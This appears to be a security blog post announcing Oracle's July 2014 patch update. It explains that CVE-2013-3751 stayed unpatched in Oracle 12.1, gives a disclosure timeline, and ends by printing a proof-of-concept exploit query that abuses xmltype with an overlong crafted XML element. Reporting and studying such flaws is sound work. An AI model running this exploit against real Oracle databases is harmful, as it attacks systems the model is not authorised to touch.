Oracle CPU July 2014 + Oracle Exploit CVE-2013-3751

Yesterday, Oracle released a new critical patch update (CPU Jul 2014) for July 2014. This CPU contains fixes for 5 database vulnerabilities. The most critical one, CVE-2013-3751, has a base score of 9.0 and affects Oracle 12.1 only. The same issue was already fixed for Oracle 11.2 in July 2013 (CPU Jul 2013).

After a short research on the web (google and twitter, less than 5 minutes) I found an exploit for the CVE-2013-3751.

This vulnerability was found by Nicolas Grégoire: He released an exploit nearly 1 year after the patch was published by Oracle. But it seems that he was not aware that Oracle forgot to fix this issue in Oracle 12.1

Timeline of CVE-2013-3751:

  • January 2012: Vulnerability found (fuzzing)
  • February 2012: Vulnerability reported to ZDI
  • March 2012: Vulnerability contracted $500
  • November 2012: Reported to Oracle by ZDI
  • July 2013: Patch published by Oracle
  • March 2014: Oracle’s Cloud still not patched
  • June 2014: Exploit released at INS#14 conference
  • July 2014: Patch for Oracle 12.1 published by Oracle

 

Exploit:

———-

select * from dual where xmltype(q'{<aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
abbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbcccccccccccccccccccccccccccccccccccccccccccccccc
ddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
ffffffffffffffffffffffffffffffffffffffffffffffffhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
iiiiiiiiiiiiiiiiiiiiiiiiii foo="bar[a &lt; b]"/>}') like '0wn3d_again';

———-

Comments are closed.